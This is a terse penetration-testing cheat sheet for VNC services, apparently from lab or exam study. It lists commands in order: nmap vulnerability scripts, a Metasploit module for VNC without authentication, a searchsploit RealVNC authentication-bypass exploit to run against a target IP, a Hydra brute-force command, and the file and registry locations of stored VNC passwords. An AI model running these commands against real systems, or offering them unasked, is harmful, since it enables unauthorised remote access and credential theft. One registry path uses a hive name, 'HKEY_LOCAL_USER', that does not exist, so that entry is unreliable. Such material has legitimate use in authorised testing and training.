VNC 5800 5900

1. Nmap - VNC Information and Vulnerability Scanning:

nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5800 10.11.1.13

2. Metasploit - RealVNC Authentication Bypass

use auxiliary/scanner/vnc/vnc_none_auth
set rhosts 10.11.1.13
set rport 5800
set threads 1
run

3. RealVNC Authentication Bypass (Exploit):

sudo searchsploit -m windows/remote/36932.py
python2 36932.py  #input target IP

4. Hydra - Brute-forcing VNC

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV

5. Password Default Locations

• Linux (TightVNC/other): Default password is stored in:

  ~/.vnc/passwd

• Windows - RealVNC: VNC password can be found in:

  HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver

• Windows - TightVNC: Password in:

  HKEY_CURRENT_USER\Software\TightVNC\Server

• Windows - TigerVNC: Stored in:

  HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4

• Windows - UltraVNC: VNC credentials stored in:

  C:\Program Files\UltraVNC\ultravnc.ini